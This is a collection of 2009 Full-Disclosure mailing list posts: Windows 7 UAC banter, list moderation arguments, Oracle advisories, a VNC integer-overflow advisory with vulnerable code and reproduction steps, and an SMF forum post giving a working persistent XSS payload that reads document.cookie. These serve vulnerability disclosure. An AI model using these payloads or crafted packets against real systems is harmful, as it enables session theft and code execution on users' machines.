Re: [Full-disclosure] Windows 7 UAC compromised
Windows says: Hello world! Check this out, world, this is really cool. Now I have, uh, something like, uh, "privileges management"! "UAC" is no more than a new commercial designation for something with about 40 years. And they (Redmond) are still missing the concept's point. On Mon, Feb 2, 2009 at 5:14 PM, Christopher Pritchard wrote: >> The biggest issue here is that although it's technically easy to fix >> this problem (just have UAC issue an alert when somebody's messing with >> the system settings), it involves doing more of what end users dislike >> most about UAC (it issuing alerts to Joe Sixpack all the time when he >> does something bone-headed security-wise). >> >> Fixing this one in a way that users will put up with will be a bitch. > > Why not just have it not prompt if you are changing settings, except for UAC > settings? that would be the simple way around it > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- Marcio Barbado, Jr. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-1009 - VNC Multiple Integer Overflows
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
VNC Multiple Integer Overflows
1. *Advisory Information*
Title: VNC Multiple Integer Overflows
Advisory ID: CORE-2008-1009
Advisory URL: http://www.coresecurity.com/content/vnc-integer-overflows
Date published: 2009-02-03
Date of last update: 2009-02-03
Vendors contacted: UltraVNC, TightVNC
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Integer overflow
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 33568
CVE Name: CVE-2009-0388
3. *Vulnerability Description*
Multiple integer overflow vulnerabilities have been discovered in
UltraVNC [1] and TightVNC [2], two (open source) remote control
applications derived from the popular VNC [3] software.
The vulnerabilities cause a miscalculation of a buffer size on the heap,
allowing an attacker to corrupt a VNC client heap and can probably allow
code execution (exploitation is very likely).
4. *Vulnerable packages*
. UltraVNC - 1.0.2
. UltraVNC - 1.0.5
. TightVnc - 1.3.9
. Older versions are probably affected too, but they were not tested
5. *Non-vulnerable packages*
. UltraVNC - 1.0.5.4
. TightVNC - 1.3.10
6. *Vendor Information, Solutions and Workarounds*
VNC users connecting to untrusted servers should update their VNC
viewers/clients.
The UltraVNC team has released patched binaries [4] for its viewer.
Additional information can be found in the UltraVNC Forum
(http://forum.ultravnc.info/).
The TightVNC team has released patched source code in [5]. TightVNC
1.3.10 will be released by Feb 10th 2009.
7. *Credits*
These vulnerabilities were discovered and researched by Ariel
Futoransky, Fernando Russ and Alfredo Ortega from Core Security
Technologies.
8. *Technical Description / Proof of Concept Code*
Multiple integer overflow vulnerabilities have been discovered in
UltraVNC and TightVNC. The vulnerable functions are located in
'ClientConnection.cpp', and they are:
. 'ClientConnection::CheckBufferSize'
. 'ClientConnection::CheckFileZipBufferSize'
These functions are used in UltraVNC - 1.0.2 (and previous versions):
. 'ClientConnection::ReadServerCutText() : 3859'
. 'ClientConnection::Authenticate() : 1701'
And in TightVNC - 1.3.9 (and previous versions):
. 'ClientConnection::ReadServerCutText() : 2951'
. 'ClientConnection::ReadFailureReason() : 3066'
Other versions may be vulnerable too.
Multiple VNC clients are affected, as they share the vulnerable code.
The integer overflow follows this pattern:
/---
unsigned int len; /* note the *unsigned int* */
// read len from the net
len = network.read_placeholder();
// check the size to ensure the network related read buffer is of the
bigger as need
CheckBufferSize( len ); // or CheckZipBufferSize(len);
// use network related red buffer
// ...
- ---/
where 'CheckBufferSize' looks like:
/---
(ClientConnection.cpp)
4185: // Makes sure netbuf is at least as big as the specified size.
4186: // Note that netbuf itself may change as a result of this call.
4187: // Throws an exception on failure.
4188: void ClientConnection::CheckBufferSize(int bufsize)
4189: {
4190: if (m_netbufsize > bufsize) return;
...
...
- ---/
and 'CheckZipBufferSize' looks like:
/---
(ClientConnection.cpp)
4238: void ClientConnection::CheckFileZipBufferSize(int bufsize)
4239: {
4240: unsigned char *newbuf;
4241:
4242: if (m_filezipbufsize > bufsize) return;
...
...
- ---/
Also, other functions like 'CheckFileZipBufferSize()' and
'CheckFileChunkBufferSize()' follow the same vulnerable pattern. The
integer overflow will ensue a heap corruption in the function
'ReadString()', often called after the bug in 'CheckBufferSize()'. This
is not a comprehensive list of possible memory corruptions caused by
this bug, as the vulnerable function is used in many places.
The integer overflow is caused because the data types of the argument
'bufsize' (signed int) and the buffers size member (unsigned long),
'm_netbufsize' and 'm_filezipbufsize'. Both are 'unsigned long', so:
'(unsigned long)-1 > (int)42 == TRUE'
because all the comparison was "casted" to unsigned long... (0x
> 0x2a).
Steps to reproduce:
The quickest way to reproduce this bug is by modifying the VNC server to
send crafted evil packets as:
/---
(from the TightVNC vncClient.cpp sourcecode...)
358: BOOL vncClientThread::SendTextStringMessage(const char *str)
359: {
360:CARD32 len = Swap32IfLE(strlen(str));
361:if (!m_socket->SendExact((char *)&len, sizeof(len)))
362:return FALSE;
363:if (!m_socket->SendExact(str, strlen(str)))
364:return FALSE;
365:
366:return TRUE;
367: }
...
- ---/
modifying the line 360, a crafted length like 0x triggers an
exception in the followi
[Full-disclosure] Team SHATTER Security Advisory: Oracle Database Buffer Overflow in SYS.OLAPIMPL_T.ODCITABLESTART
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Team SHATTER Security Advisory Oracle Database Buffer Overflow in SYS.OLAPIMPL_T.ODCITABLESTART January 29, 2009 Risk Level: High Affected versions: Oracle Database Server version 9iR2 Remote exploitable: Yes (Authentication to Database Server is needed) Credits: This vulnerability was discovered and researched by Esteban Martínez Fayó of Application Security Inc. Details: Oracle Database Server provides the SYS.OLAPIMPL_T package. This package contains the procedure ODCITABLESTART which is vulnerable to buffer overflow attacks. Impact: By default SYS.OLAPIMPL_T has EXECUTE permission to PUBLIC so any Oracle database user can exploit this vulnerability. Exploitation of this vulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause DoS (Denial of service) killing the Oracle server process. Vendor Status: Vendor was contacted and a patch was released. Workaround: Restrict access to the SYS.OLAPIMPL_T package. Fix: Apply Oracle Critical Patch Update January 2009 available at Oracle Metalink. CVE: CVE-2008-3974 Links: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html http://www.appsecinc.com/resources/alerts/oracle/2009-02.shtml Timeline: Vendor Notification - 2/22/2005 Fix - 1/13/2009 Public Disclosure - 1/29/2009 Application Security, Inc's database security solutions have helped over 1000 organizations secure their databases from all internal and external threats while also ensuring that those organizations meet or exceed regulatory compliance and audit requirements. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) - WinPT 1.2.0 iD8DBQFJiIWQ9EOAcmTuFN0RAv+kAJ9RjYAJaLMJoNMvVs4yexLgE7KZ3ACgsaf2 W5Hipr89dBLv1um+VRaM9Ds= =cLj7 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Team SHATTER Security Advisory: SQL Injection in Oracle Enterprise Manager (TARGET Parameter)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Team SHATTER Security Advisory SQL Injection in Oracle Enterprise Manager (TARGET Parameter) January 29, 2009 Risk Level: Medium Affected versions: Oracle Enterprise Manager 10g Grid Control 10.2.0.4 and previous patchsets Remote exploitable: Yes (Authentication is needed) Credits: This vulnerability was discovered and researched by Esteban Martínez Fayó of Application Security Inc. Details: SQL Injection works by attempting to modify the parameters passed to an application to change the SQL statements that are passed to a database. SQL injection can be used to insert additional SQL statements to be executed. The "TARGET" parameter used in web page /em/console/reports/admin of Oracle Enterprise Manager web application is vulnerable to SQL Injection attacks. It may be possible for a malicious user to execute a function with the elevated privileges of the SYSMAN database user in the repository database. This user has the DBA role granted. Impact: This vulnerability allow a Oracle Enterprise Manager user with VIEW (or more) privileges to execute a function call with the elevated privileges of the SYSMAN database user. Vendor Status: Vendor was contacted and a patch was released. Workaround: There is no workaround for this issue. Fix: Apply Oracle Critical Patch Update January 2009 available at Oracle Metalink. CVE: CVE-2008-5447 Links: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html Timeline: Vendor Notification - 7/11/2008 Vendor Response - 7/14/2008 Fix - 1/13/2009 Public Disclosure - 1/29/2009 Application Security, Inc's database security solutions have helped over 1000 organizations secure their databases from all internal and external threats while also ensuring that those organizations meet or exceed regulatory compliance and audit requirements. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) - WinPT 1.2.0 iD8DBQFJiIST9EOAcmTuFN0RAm6pAKDHp1EHjVu0lxzzNK2ANJJLzMNrvQCgxplB KsqKYUSlrpMTg9Bc7lKqy+Y= =bSNt -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Administrivia: Spring Cleaning
Who cares anyway ? 2009/2/3 Ureleet > > > i guarantee hes watching right now. > > On Mon, Feb 2, 2009 at 12:32 AM, Biz Marqee wrote: > > n3td3v being moderated is fantastic. > > > > his banning is not a strike against the "spirit" of fd, its someone > standing > > up and saying "I have had enough of this fruitcake". > > > > full disclosure is great when its dropping 0day, discussing security in > > general, coming off as a righteous plan9 ninja, insulting people who > > disagree with your opinion and all the rest that goes along with it. it > isnt > > great when you have a serial pest constantly baiting people and flooding > the > > list with junk... junk that has no technical or even comedic value. its > just > > rambling. he isnt some passing troll.. 3 years this guy has been spouting > > his nonsense and i am sure this isnt a decision that John takes lightly > but > > something needed to be done before everyone left. > > > > > > ___ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] BBC "cyber war" piece
"Nato officials have told the BBC their computers are under constant attack from organisations and individuals bent on trying to hack into their secrets." http://news.bbc.co.uk/go/rss/-/1/hi/world/europe/7851292.stm (NB - the author of that piece, IMNSHO, has a tendency to sound like an uncritical mouthpiece for the military-spooky complex.) =i -- make way for history flickering like a long-lost memory ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Windows 7 UAC compromised
On Tue, 03 Feb 2009 09:48:48 EST, Ureleet said: > y not have ur os secure in the first place and designed with full > permissions instead of bothering the user. look at linux, look at > unix. theyve been doing it 4 years. Well, that *would* be an alternate way to design a system - but how would you migrate an existing Windows box to a Windows 8 that did that? There is *such* a mass of software written specifically around all the cruft in the Windows APIs that the inertia is the single biggest reason people keep running Windows boxes. pgpDAFEjIwWVp.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Windows 7 UAC compromised
y not have ur os secure in the first place and designed with full permissions instead of bothering the user. look at linux, look at unix. theyve been doing it 4 years. On Mon, Feb 2, 2009 at 2:14 PM, Christopher Pritchard wrote: >> The biggest issue here is that although it's technically easy to fix >> this problem (just have UAC issue an alert when somebody's messing with >> the system settings), it involves doing more of what end users dislike >> most about UAC (it issuing alerts to Joe Sixpack all the time when he >> does something bone-headed security-wise). >> >> Fixing this one in a way that users will put up with will be a bitch. > > Why not just have it not prompt if you are changing settings, except for UAC > settings? that would be the simple way around it > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Administrivia: Spring Cleaning
i m willing to bet he is still on the list tho. who knows how many aliases he has. no--i m not 1, even tho he accuses me of being 1. i guarantee hes watching right now. On Mon, Feb 2, 2009 at 12:32 AM, Biz Marqee wrote: > n3td3v being moderated is fantastic. > > his banning is not a strike against the "spirit" of fd, its someone standing > up and saying "I have had enough of this fruitcake". > > full disclosure is great when its dropping 0day, discussing security in > general, coming off as a righteous plan9 ninja, insulting people who > disagree with your opinion and all the rest that goes along with it. it isnt > great when you have a serial pest constantly baiting people and flooding the > list with junk... junk that has no technical or even comedic value. its just > rambling. he isnt some passing troll.. 3 years this guy has been spouting > his nonsense and i am sure this isnt a decision that John takes lightly but > something needed to be done before everyone left. > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SMF 1.1.7 Persistent XSS (requires permision to edit censor)
SMF 1.1.7 (simplemachines.org) XSS Exploitation: If you can modify the censor on a SMF forum, then you can make it execute arbitrary JS code. http://SMF.Forum.com/index.php?action=postsettings;sa=censor Just add the following entry: http://www.test.xss/ => http://www.test-xss/"; onerror="alert(document.cookie) And then write a post, modify your signature, or send a PM with the code: [img]http://www.test.xss/[/img] And the HTML code generated will be.. http://www.test-xss/"; onerror="alert(document.cookie)" alt="" border="0" /> Notes: - SMF is not using httpOnly cookies. - I'm going full disclosure with this because I've had bad experiences with the SMF team when reporting vulnerabilities.. Greetings!! -- Eduardo http://www.sirdarckcat.net/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
